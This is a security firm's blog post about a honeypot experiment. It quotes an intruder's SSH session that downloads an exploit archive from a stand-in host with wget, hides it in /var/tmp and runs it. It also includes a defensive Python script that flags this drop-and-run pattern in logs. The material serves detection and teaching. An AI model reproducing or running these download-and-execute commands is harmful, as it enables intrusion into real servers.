Honeypots - Watching the hacker in action
A honeypot is an application that simulates operating systems and network applications with vulnerabilities while silently logging the attacker's moves. The objective is to trap hackers and learn about their behaviour, to collect malware for analysis, and to distract the attacker from real systems.
WatSec provisioned a VPS (Virtual Private Server) in the cloud and installed two honeypot systems. One honeypot application offered a secure shell (SSH) service and the other simulated several services with well-known vulnerabilities.
The SSH honeypot had a 'root' (system administrator) account and password. Five hours after the server was created - with an IP address that was inactive for some time - we detected the first successful intrusion; a scanner being run by a malicious agent had detected the open SSH service and guessed the root password.
After running this server for a month WatSec found 75 malicious uploads and 2,483 probes or exploit attempts from many parts of the world.
Here's an example of an intruder's SSH session, taken from a real interaction and lightly edited for clarity.
First the attacker checks if someone is logged in and looks for some basic information about the system:
$ w
$ cat /proc/cpuinfo;uname -a;
Then he creates a hidden directory (its name is just one space) in the temporary directory, which is usually writable by anyone and thus a favorite destination for crackers:
$ cd /var/tmp;mkdir " ";cd " ";mkdir .ssh;cd .ssh;
Now he downloads a compressed exploit:
$ wget http://somebadsite.expl.tgz
Next he prepares the file, extracting it and making it executable:
$ tar xvf expl.tgz;rm -rf expl.tgz;cd expl;chmod +xw *
Finally he runs the malicious software, in this case an SSH brute-force tool that could be used, for example, to break into an accounting system:
$ ./a1
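The session above follows a recognisable drop-and-run pattern: reconnaissance, a working directory under a world-writable temp path, a hidden directory name, an archive download, chmod +x, and execution from that directory. Here is an added example (not WatSec's honeypot code, and not the tooling the honeypots used) of how a defender could scan recorded honeypot commands for that pattern. The log format (session id followed by the raw command line), the session ids and the download URL are constructed for illustration.

```python
"""Flag the drop-and-run intrusion pattern in recorded honeypot shell commands.
Added example; the log format and all sample lines are constructed."""
import re
import shlex
from collections import defaultdict

# Constructed sample log: "<session id> <raw command line>", one line per command.
# Session s1 mirrors the intruder session described above; s2 is a low-activity session.
SAMPLE_LOG = """\
s1 w
s1 cat /proc/cpuinfo;uname -a;
s1 cd /var/tmp;mkdir " ";cd " ";mkdir .ssh;cd .ssh;
s1 wget http://somebadsite.invalid/expl.tgz
s1 tar xvf expl.tgz;rm -rf expl.tgz;cd expl;chmod +xw *
s1 ./a1
s2 uname -a
s2 cat /etc/motd
"""

TMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")               # world-writable staging areas
ARCHIVE_RE = re.compile(r"\.(tgz|tar(\.gz|\.bz2|\.xz)?|zip)$", re.IGNORECASE)
EXEC_MODE_RE = re.compile(r"^[ugoa]*\+[rwst]*x")           # symbolic modes such as +x, +xw, a+x
STAGES = ("recon", "tmp_workdir", "hidden_dir", "download", "make_executable", "execute")


def split_commands(line):
    """Split a shell line on ';' and tokenise each piece with shell quoting rules.
    (Naive on ';' inside quotes, which is fine for the sample log.)"""
    parts = []
    for piece in line.split(";"):
        piece = piece.strip()
        if not piece:
            continue
        try:
            argv = shlex.split(piece)
        except ValueError:            # unbalanced quotes: fall back to whitespace split
            argv = piece.split()
        if argv:
            parts.append(argv)
    return parts


def classify(argv):
    """Return the stage of the drop-and-run pattern this argv matches, or None."""
    cmd, args = argv[0], argv[1:]
    if cmd in ("w", "who", "uname", "id", "last") or (cmd == "cat" and "/proc/cpuinfo" in args):
        return "recon"
    if cmd == "cd" and args and args[0].rstrip("/") in TMP_DIRS:
        return "tmp_workdir"
    # A directory named with only whitespace, or dot-prefixed, hides from a casual "ls".
    if cmd == "mkdir" and args and (args[-1].strip() == "" or args[-1].startswith(".")):
        return "hidden_dir"
    if cmd in ("wget", "curl") and any(ARCHIVE_RE.search(a) for a in args):
        return "download"
    if cmd == "chmod" and any(EXEC_MODE_RE.match(a) for a in args):
        return "make_executable"      # numeric modes like 755 are deliberately not matched here
    if cmd.startswith("./"):
        return "execute"
    return None


def analyse(log_text):
    """Group commands by session and report the stages each session hit.
    Returns {session_id: (stages in pattern order, flagged)}; a session is flagged
    when it downloaded an archive and showed at least two staging/execution steps."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        sid, _, cmdline = line.partition(" ")
        if not cmdline:
            continue
        hits[sid]                      # register the session even if nothing matches
        for argv in split_commands(cmdline):
            stage = classify(argv)
            if stage:
                hits[sid].add(stage)
    report = {}
    for sid, stages in hits.items():
        post_download = stages & {"tmp_workdir", "hidden_dir", "make_executable", "execute"}
        flagged = "download" in stages and len(post_download) >= 2
        report[sid] = (sorted(stages, key=STAGES.index), flagged)
    return report


if __name__ == "__main__":
    for sid, (stages, flagged) in analyse(SAMPLE_LOG).items():
        print(f"{sid}: {'FLAGGED' if flagged else 'ok'} {stages}")
```

The rule set is deliberately narrow, keyed to the stages the session above actually shows, so it says little about sessions that stop after reconnaissance (s2 in the sample). In practice the same scan would run over the honeypot's command log as it is written, and a flagged session is the cue to pull the downloaded archive for analysis rather than to act on the single chmod or wget in isolation.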
The lesson here is that if you have a network service exposed to the Internet with a weak password or a known vulnerability it’s only a matter of hours or days until your server is compromised.
Take a preventative approach to cybercrime
How do you know if your data really is protected?
Contact us today for a free consultation.
(519) 747 2549